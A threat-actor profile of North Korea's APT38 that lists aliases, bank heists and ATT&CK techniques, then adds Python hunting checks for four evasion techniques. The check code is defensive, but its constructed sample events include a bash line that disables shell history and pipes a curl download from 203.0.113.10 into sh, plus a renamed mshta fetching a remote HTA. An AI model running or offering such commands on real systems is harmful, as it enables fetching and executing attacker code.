Threat Actor Profile

APT38

Aliases: ATK 117, BeagleBoyz, Bluenoroff, COPERNICIUM, NICKEL GLADSTONE, Sapphire Sleet, Stardust Chollima (MITRE ATT&CK group ID G0082)
Threat level: High
[APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financially motivated cyber operations; it has been attributed to the Reconnaissance General Bureau (CISA AA20-239A, BeagleBoyz, August 2020). Active since at least 2014, APT38 has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bangladesh Bank heist, in which APT38 fraudulently transferred $81 million through the bank's SWIFT connection, as well as attacks against Bancomext and Banco de Chile (FireEye APT38, October 2018). Some of its intrusions have ended with destructive wiping of victim systems, as the Data Destruction and Disk Structure Wipe entries below reflect (CISA AA20-239A, August 2020; FireEye APT38, October 2018; DOJ North Korea indictment, February 2021; Kaspersky "Lazarus Under The Hood", 2017).

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups. When correlating reporting on this actor, treat the aliases above as the same cluster only where the source explicitly maps them to APT38/Bluenoroff rather than to Lazarus Group as a whole.
Origin

North Korea (attributed to the Reconnaissance General Bureau)
Known TTPs

Data Encrypted for Impact
Process Injection
System Owner/User Discovery
Modify Registry
System Network Connections Discovery
File Deletion
Space after Filename
Keylogging
Security Software Discovery
Windows Service
Bypass User Account Control
Drive-by Compromise
File and Directory Discovery
Windows Command Shell
Deobfuscate/Decode Files or Information
Visual Basic
System Shutdown/Reboot
Malicious Link
Web Protocols
Ingress Tool Transfer
Disable or Modify Tools
Software Packing
Browser Information Discovery
Clear Windows Event Logs
Mshta
Timestomp
Disable or Modify System Firewall
Data Destruction
Brute Force
Network Share Discovery
Mark-of-the-Web Bypass
System Information Discovery
Transmitted Data Manipulation
Network Device Firewall
Disk Structure Wipe
Rename Legitimate Utilities
Prevent Command History Logging
Scheduled Task
Tool
Web Shell
Clipboard Data
Rundll32
Runtime Data Manipulation
Domains
Native API
Compiled HTML File
Malicious File
Stored Data Manipulation
Data from Local System
PowerShell
Cron
Spearphishing Attachment
Msiexec
Service Execution
Mutual Exclusion
Process Discovery
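
The entries above are ATT&CK technique names only. As an added example that is not part of this profile or of any MITRE or CISA material, the following Python turns four of the defense-evasion entries (Rename Legitimate Utilities, Space after Filename, Prevent Command History Logging, Clear Windows Event Logs) into hunting checks over constructed, Sysmon-style process-creation and event-log records. Field names (Image, OriginalFileName, CommandLine, Channel, EventID) follow Sysmon and Windows Event Log conventions; the sample records, file names and the 203.0.113.10 address are constructed for the example.

```python
"""Hunting checks for four defense-evasion TTPs listed in this profile.

Added example; not code from the page, MITRE ATT&CK or CISA.  The records in
SAMPLE_EVENTS are constructed Sysmon-style events, not real telemetry.
"""
import ntpath  # handles both "\\" and "/" separators, so Windows paths parse on any host
import re

# Windows utilities this profile lists under Known TTPs (Mshta, Rundll32, Msiexec).
# Rename Legitimate Utilities (T1036.003): the on-disk name no longer matches the
# PE version-info OriginalFileName, which Sysmon records on process creation.
LOLBIN_ORIGINAL_NAMES = {"mshta.exe", "rundll32.exe", "msiexec.exe"}

# Prevent Command History Logging (T1562.003) on Unix-like hosts: common ways
# of turning off the shell's history file from the command line.
HISTORY_DISABLE = re.compile(
    r"(unset\s+HISTFILE|HISTFILE=/dev/null|HISTSIZE=0|set\s+\+o\s+history)"
)


def renamed_lolbin(event):
    """True when a listed utility runs under a different file name."""
    original = (event.get("OriginalFileName") or "").lower()
    image = ntpath.basename(event.get("Image", "")).lower()
    return original in LOLBIN_ORIGINAL_NAMES and image != original


def space_after_filename(event):
    """Space after Filename (T1036.006): a space trailing the name, or inserted
    before the final extension ("statement.pdf .exe"), hides the real type."""
    name = ntpath.basename(event.get("Image", ""))
    stem, _ext = ntpath.splitext(name)
    return stem.endswith(" ") or name.endswith(" ")


def history_logging_disabled(event):
    """True when the command line disables shell history."""
    return bool(HISTORY_DISABLE.search(event.get("CommandLine", "")))


def event_log_cleared(event):
    """Clear Windows Event Logs (T1070.001): Security log cleared (1102)
    or System log cleared (104)."""
    channel, eid = event.get("Channel"), event.get("EventID")
    return (channel == "Security" and eid == 1102) or (channel == "System" and eid == 104)


CHECKS = {
    "Rename Legitimate Utilities": renamed_lolbin,
    "Space after Filename": space_after_filename,
    "Prevent Command History Logging": history_logging_disabled,
    "Clear Windows Event Logs": event_log_cleared,
}


def triage(events):
    """Return {technique name: [event ids]} for every check that fires."""
    hits = {}
    for ev in events:
        for technique, check in CHECKS.items():
            if check(ev):
                hits.setdefault(technique, []).append(ev["id"])
    return hits


# Constructed sample telemetry (not from any real incident).
SAMPLE_EVENTS = [
    # Benign: rundll32 running under its own name.
    {"id": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},
    # mshta copied to a user-writable path and renamed.
    {"id": 2, "Image": r"C:\Users\Public\svchost32.exe",
     "OriginalFileName": "mshta.exe",
     "CommandLine": "svchost32.exe https://203.0.113.10/a.hta"},
    # Executable disguised as a PDF with a space before the real extension.
    {"id": 3, "Image": r"C:\Users\Public\Downloads\statement.pdf .exe",
     "OriginalFileName": "statement.exe", "CommandLine": "statement.pdf .exe"},
    # Shell history disabled before fetching a second stage.
    {"id": 4, "Image": "/bin/bash",
     "CommandLine": "bash -c 'unset HISTFILE; curl http://203.0.113.10/x | sh'"},
    # Security log cleared.
    {"id": 5, "Channel": "Security", "EventID": 1102, "Image": "", "CommandLine": ""},
]

if __name__ == "__main__":
    for technique, ids in triage(SAMPLE_EVENTS).items():
        print(f"{technique}: events {ids}")
```

The OriginalFileName comparison is the cheapest of these checks and the hardest for an operator to evade without also patching the binary's version resource, which in turn breaks Authenticode; the history-logging regex, by contrast, only catches the obvious forms and should be read as a starting point rather than a complete signature.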

External Resources

CISA Advisories
